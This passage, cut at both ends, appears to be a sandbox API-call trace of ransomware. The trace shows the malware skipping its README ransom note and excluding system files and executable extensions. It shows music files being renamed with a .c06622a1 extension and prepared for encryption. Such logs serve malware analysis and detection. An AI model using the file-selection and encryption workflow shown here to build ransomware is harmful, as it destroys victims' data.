Buffer=0x3fe3f4, Length=0x80) returned 0x22367621 [0150.889] CloseHandle (hObject=0x67c) returned 1 [0150.889] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0150.889] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\XIUHvad VlT72LhL.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\XIUHvad VlT72LhL.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\XIUHvad VlT72LhL.mp3" [0150.889] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\XIUHvad VlT72LhL.mp3") returned 0x6c [0150.889] wcscpy (in: _Dest=0x45701a0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.889] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\XIUHvad VlT72LhL.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\xiuhvad vlt72lhl.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\XIUHvad VlT72LhL.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\xiuhvad vlt72lhl.mp3.c06622a1"), dwFlags=0x8) returned 1 [0150.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\XIUHvad VlT72LhL.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\xiuhvad vlt72lhl.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x67c [0150.892] CreateIoCompletionPort (FileHandle=0x67c, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0150.892] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4280020 [0150.897] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xf39dee6 [0150.897] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3d7e310a [0150.897] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xca6b0a8 [0150.897] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4a97428b [0150.897] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x699349 [0150.897] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xdfad148 [0150.897] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x541690b8 [0150.897] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5595a250 [0150.900] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4280094, Length=0x80) returned 0x2a67ffb5 [0150.900] RtlComputeCrc32 (PartialCrc=0xffb5, Buffer=0x4280094, Length=0x80) returned 0x614c444e [0150.900] RtlComputeCrc32 (PartialCrc=0x444e, Buffer=0x4280094, Length=0x80) returned 0x2751db84 [0150.900] RtlComputeCrc32 (PartialCrc=0xdb84, Buffer=0x4280094, Length=0x80) returned 0x24383995 [0150.900] RtlComputeCrc32 (PartialCrc=0x3995, Buffer=0x4280094, Length=0x80) returned 0x210c76f7 [0150.900] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0150.901] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0150.901] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0150.901] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0150.901] FindClose (in: hFindFile=0x2db8800 | out: hFindFile=0x2db8800) returned 1 [0150.901] _wcsicmp (_Str1="backup", _Str2="fV7b28tZTM YqY0S") returned -4 [0150.901] wcslen (_String="backup") returned 0x6 [0150.901] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0150.901] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0150.901] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab6a9160, ftCreationTime.dwHighDateTime=0x1d5e48c, ftLastAccessTime.dwLowDateTime=0x5088c860, ftLastAccessTime.dwHighDateTime=0x1d5e073, ftLastWriteTime.dwLowDateTime=0x5088c860, ftLastWriteTime.dwHighDateTime=0x1d5e073, nFileSizeHigh=0x0, nFileSizeLow=0x11394, dwReserved0=0x0, dwReserved1=0x0, cFileName="LpaHDPB.mp3", cAlternateFileName="")) returned 1 [0150.901] _wcsicmp (_Str1="LpaHDPB.mp3", _Str2="README.c06622a1.TXT") returned -6 [0150.902] wcsstr (_Str="LpaHDPB.mp3", _SubStr="README") returned 0x0 [0150.902] _wcsicmp (_Str1="autorun.inf", _Str2="LpaHDPB.mp3") returned -11 [0150.902] wcslen (_String="autorun.inf") returned 0xb [0150.902] _wcsicmp (_Str1="boot.ini", _Str2="LpaHDPB.mp3") returned -10 [0150.902] wcslen (_String="boot.ini") returned 0x8 [0150.902] _wcsicmp (_Str1="bootfont.bin", _Str2="LpaHDPB.mp3") returned -10 [0150.902] wcslen (_String="bootfont.bin") returned 0xc [0150.902] _wcsicmp (_Str1="bootsect.bak", _Str2="LpaHDPB.mp3") returned -10 [0150.902] wcslen (_String="bootsect.bak") returned 0xc [0150.902] _wcsicmp (_Str1="desktop.ini", _Str2="LpaHDPB.mp3") returned -8 [0150.903] wcslen (_String="desktop.ini") returned 0xb [0150.903] _wcsicmp (_Str1="iconcache.db", _Str2="LpaHDPB.mp3") returned -3 [0150.903] wcslen (_String="iconcache.db") returned 0xc [0150.903] _wcsicmp (_Str1="ntldr", _Str2="LpaHDPB.mp3") returned 2 [0150.903] wcslen (_String="ntldr") returned 0x5 [0150.903] _wcsicmp (_Str1="ntuser.dat", _Str2="LpaHDPB.mp3") returned 2 [0150.903] wcslen (_String="ntuser.dat") returned 0xa [0150.903] _wcsicmp (_Str1="ntuser.dat.log", _Str2="LpaHDPB.mp3") returned 2 [0150.903] wcslen (_String="ntuser.dat.log") returned 0xe [0150.903] _wcsicmp (_Str1="ntuser.ini", _Str2="LpaHDPB.mp3") returned 2 [0150.903] wcslen (_String="ntuser.ini") returned 0xa [0150.903] _wcsicmp (_Str1="thumbs.db", _Str2="LpaHDPB.mp3") returned 8 [0150.903] wcslen (_String="thumbs.db") returned 0x9 [0150.903] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0150.903] wcslen (_String="386") returned 0x3 [0150.903] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0150.903] wcslen (_String="adv") returned 0x3 [0150.903] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0150.903] wcslen (_String="ani") returned 0x3 [0150.903] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0150.903] wcslen (_String="bat") returned 0x3 [0150.903] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0150.903] wcslen (_String="bin") returned 0x3 [0150.903] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0150.903] wcslen (_String="cab") returned 0x3 [0150.903] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0150.903] wcslen (_String="cmd") returned 0x3 [0150.903] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0150.903] wcslen (_String="com") returned 0x3 [0150.903] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0150.903] wcslen (_String="cpl") returned 0x3 [0150.903] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0150.903] wcslen (_String="cur") returned 0x3 [0150.903] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0150.903] wcslen (_String="deskthemepack") returned 0xd [0150.903] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0150.903] wcslen (_String="diagcab") returned 0x7 [0150.904] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0150.904] wcslen (_String="diagcfg") returned 0x7 [0150.904] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0150.904] wcslen (_String="diagpkg") returned 0x7 [0150.904] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0150.904] wcslen (_String="dll") returned 0x3 [0150.904] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0150.904] wcslen (_String="drv") returned 0x3 [0150.904] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0150.904] wcslen (_String="exe") returned 0x3 [0150.904] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0150.904] wcslen (_String="hlp") returned 0x3 [0150.904] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0150.904] wcslen (_String="icl") returned 0x3 [0150.904] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0150.904] wcslen (_String="icns") returned 0x4 [0150.904] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0150.904] wcslen (_String="ico") returned 0x3 [0150.904] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0150.904] wcslen (_String="ics") returned 0x3 [0150.904] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0150.904] wcslen (_String="idx") returned 0x3 [0150.904] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0150.904] wcslen (_String="ldf") returned 0x3 [0150.904] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0150.904] wcslen (_String="lnk") returned 0x3 [0150.904] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0150.904] wcslen (_String="mod") returned 0x3 [0150.904] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0150.904] wcslen (_String="mpa") returned 0x3 [0150.904] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0150.904] wcslen (_String="msc") returned 0x3 [0150.904] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0150.904] wcslen (_String="msp") returned 0x3 [0150.904] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0150.904] wcslen (_String="msstyles") returned 0x8 [0150.904] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0150.904] wcslen (_String="msu") returned 0x3 [0150.905] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0150.905] wcslen (_String="nls") returned 0x3 [0150.905] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0150.905] wcslen (_String="nomedia") returned 0x7 [0150.905] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0150.905] wcslen (_String="ocx") returned 0x3 [0150.905] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0150.905] wcslen (_String="prf") returned 0x3 [0150.905] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0150.905] wcslen (_String="ps1") returned 0x3 [0150.905] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0150.905] wcslen (_String="rom") returned 0x3 [0150.905] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0150.905] wcslen (_String="rtp") returned 0x3 [0150.905] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0150.905] wcslen (_String="scr") returned 0x3 [0150.905] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0150.905] wcslen (_String="shs") returned 0x3 [0150.905] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0150.905] wcslen (_String="spl") returned 0x3 [0150.905] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0150.905] wcslen (_String="sys") returned 0x3 [0150.905] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0150.905] wcslen (_String="theme") returned 0x5 [0150.905] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0150.905] wcslen (_String="themepack") returned 0x9 [0150.905] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0150.905] wcslen (_String="wpx") returned 0x3 [0150.905] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0150.905] wcslen (_String="lock") returned 0x4 [0150.905] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0150.905] wcslen (_String="key") returned 0x3 [0150.905] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0150.905] wcslen (_String="hta") returned 0x3 [0150.905] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0150.905] wcslen (_String="msi") returned 0x3 [0150.905] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0150.906] wcslen (_String="pdb") returned 0x3 [0150.906] _wcsicmp (_Str1="sql", _Str2="mp3") returned 6 [0150.906] wcslen (_String="sql") returned 0x3 [0150.906] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0150.906] wcslen (_String="sqlite") returned 0x6 [0150.906] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd")) returned 0x10 [0150.906] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0150.906] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD" [0150.906] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD") returned 0x46 [0150.906] wcscpy (in: _Dest=0x4530136, _Source="LpaHDPB.mp3" | out: _Dest="LpaHDPB.mp3") returned="LpaHDPB.mp3" [0150.906] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\LpaHDPB.mp3", dwFileAttributes=0x80) returned 1 [0150.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\LpaHDPB.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\lpahdpb.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x674 [0150.906] SetFilePointerEx (in: hFile=0x674, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.906] ReadFile (in: hFile=0x674, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0150.907] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x8bfaf39d [0150.907] RtlComputeCrc32 (PartialCrc=0xf39d, Buffer=0x3fe674, Length=0x80) returned 0x9d19a583 [0150.907] RtlComputeCrc32 (PartialCrc=0xa583, Buffer=0x3fe674, Length=0x80) returned 0x2764e18e [0150.907] RtlComputeCrc32 (PartialCrc=0xe18e, Buffer=0x3fe674, Length=0x80) returned 0x7696d9f0 [0150.907] RtlComputeCrc32 (PartialCrc=0xd9f0, Buffer=0x3fe674, Length=0x80) returned 0x702e238b [0150.907] CloseHandle (hObject=0x674) returned 1 [0150.907] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0150.907] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\LpaHDPB.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\LpaHDPB.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\LpaHDPB.mp3" [0150.907] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\LpaHDPB.mp3") returned 0x52 [0150.907] wcscpy (in: _Dest=0x4540154, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.907] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\LpaHDPB.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\lpahdpb.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\LpaHDPB.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\lpahdpb.mp3.c06622a1"), dwFlags=0x8) returned 1 [0150.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\LpaHDPB.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\lpahdpb.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x674 [0150.909] CreateIoCompletionPort (FileHandle=0x674, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0150.909] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4670020 [0150.914] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5c6151b7 [0150.914] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7d6eed37 [0150.914] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5d2056f0 [0150.915] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5cee0ca7 [0150.915] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x69a78a43 [0150.915] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x73eba5ed [0150.915] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2657a803 [0150.915] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2f3bb081 [0150.918] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4670094, Length=0x80) returned 0xf0e7b6c0 [0150.918] RtlComputeCrc32 (PartialCrc=0xb6c0, Buffer=0x4670094, Length=0x80) returned 0xca265028 [0150.918] RtlComputeCrc32 (PartialCrc=0x5028, Buffer=0x4670094, Length=0x80) returned 0xe920ea89 [0150.918] RtlComputeCrc32 (PartialCrc=0xea89, Buffer=0x4670094, Length=0x80) returned 0xdb218c2a [0150.918] RtlComputeCrc32 (PartialCrc=0x8c2a, Buffer=0x4670094, Length=0x80) returned 0x449d4feb [0150.918] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0150.918] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0150.918] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0150.918] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd856ba40, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd856ba40, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd856ba40, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0150.918] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0150.918] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0150.918] FindClose (in: hFindFile=0x2db87c0 | out: hFindFile=0x2db87c0) returned 1 [0150.918] _wcsicmp (_Str1="backup", _Str2="sp6AE4NZCo52aGrKxD") returned -17 [0150.918] wcslen (_String="backup") returned 0x6 [0150.918] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.919] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.919] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0150.919] FindClose (in: hFindFile=0x2db8780 | out: hFindFile=0x2db8780) returned 1 [0150.920] _wcsicmp (_Str1="backup", _Str2="4ytVPICjNJN") returned 46 [0150.920] wcslen (_String="backup") returned 0x6 [0150.920] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0150.920] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0150.920] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83d415b0, ftCreationTime.dwHighDateTime=0x1d5e2ff, ftLastAccessTime.dwLowDateTime=0x7f38cc20, ftLastAccessTime.dwHighDateTime=0x1d5d9be, ftLastWriteTime.dwLowDateTime=0x7f38cc20, ftLastWriteTime.dwHighDateTime=0x1d5d9be, nFileSizeHigh=0x0, nFileSizeLow=0x12f33, dwReserved0=0x0, dwReserved1=0x0, cFileName="D0sN2boASCy9vEbn.m4a", cAlternateFileName="D0SN2B~1.M4A")) returned 1 [0150.920] _wcsicmp (_Str1="D0sN2boASCy9vEbn.m4a", _Str2="README.c06622a1.TXT") returned -14 [0150.920] wcsstr (_Str="D0sN2boASCy9vEbn.m4a", _SubStr="README") returned 0x0 [0150.920] _wcsicmp (_Str1="autorun.inf", _Str2="D0sN2boASCy9vEbn.m4a") returned -3 [0150.921] wcslen (_String="autorun.inf") returned 0xb [0150.921] _wcsicmp (_Str1="boot.ini", _Str2="D0sN2boASCy9vEbn.m4a") returned -2 [0150.921] wcslen (_String="boot.ini") returned 0x8 [0150.921] _wcsicmp (_Str1="bootfont.bin", _Str2="D0sN2boASCy9vEbn.m4a") returned -2 [0150.921] wcslen (_String="bootfont.bin") returned 0xc [0150.921] _wcsicmp (_Str1="bootsect.bak", _Str2="D0sN2boASCy9vEbn.m4a") returned -2 [0150.921] wcslen (_String="bootsect.bak") returned 0xc [0150.921] _wcsicmp (_Str1="desktop.ini", _Str2="D0sN2boASCy9vEbn.m4a") returned 53 [0150.921] wcslen (_String="desktop.ini") returned 0xb [0150.921] _wcsicmp (_Str1="iconcache.db", _Str2="D0sN2boASCy9vEbn.m4a") returned 5 [0150.921] wcslen (_String="iconcache.db") returned 0xc [0150.921] _wcsicmp (_Str1="ntldr", _Str2="D0sN2boASCy9vEbn.m4a") returned 10 [0150.921] wcslen (_String="ntldr") returned 0x5 [0150.921] _wcsicmp (_Str1="ntuser.dat", _Str2="D0sN2boASCy9vEbn.m4a") returned 10 [0150.921] wcslen (_String="ntuser.dat") returned 0xa [0150.921] _wcsicmp (_Str1="ntuser.dat.log", _Str2="D0sN2boASCy9vEbn.m4a") returned 10 [0150.921] wcslen (_String="ntuser.dat.log") returned 0xe [0150.921] _wcsicmp (_Str1="ntuser.ini", _Str2="D0sN2boASCy9vEbn.m4a") returned 10 [0150.921] wcslen (_String="ntuser.ini") returned 0xa [0150.921] _wcsicmp (_Str1="thumbs.db", _Str2="D0sN2boASCy9vEbn.m4a") returned 16 [0150.921] wcslen (_String="thumbs.db") returned 0x9 [0150.921] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0150.921] wcslen (_String="386") returned 0x3 [0150.921] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0150.921] wcslen (_String="adv") returned 0x3 [0150.921] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0150.921] wcslen (_String="ani") returned 0x3 [0150.921] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0150.921] wcslen (_String="bat") returned 0x3 [0150.921] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0150.921] wcslen (_String="bin") returned 0x3 [0150.921] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0150.921] wcslen (_String="cab") returned 0x3 [0150.921] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0150.921] wcslen (_String="cmd") returned 0x3 [0150.921] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0150.921] wcslen (_String="com") returned 0x3 [0150.921] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0150.921] wcslen (_String="cpl") returned 0x3 [0150.922] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0150.922] wcslen (_String="cur") returned 0x3 [0150.922] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0150.922] wcslen (_String="deskthemepack") returned 0xd [0150.922] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0150.922] wcslen (_String="diagcab") returned 0x7 [0150.922] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0150.922] wcslen (_String="diagcfg") returned 0x7 [0150.922] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0150.922] wcslen (_String="diagpkg") returned 0x7 [0150.922] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0150.922] wcslen (_String="dll") returned 0x3 [0150.922] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0150.922] wcslen (_String="drv") returned 0x3 [0150.922] _wcsicmp 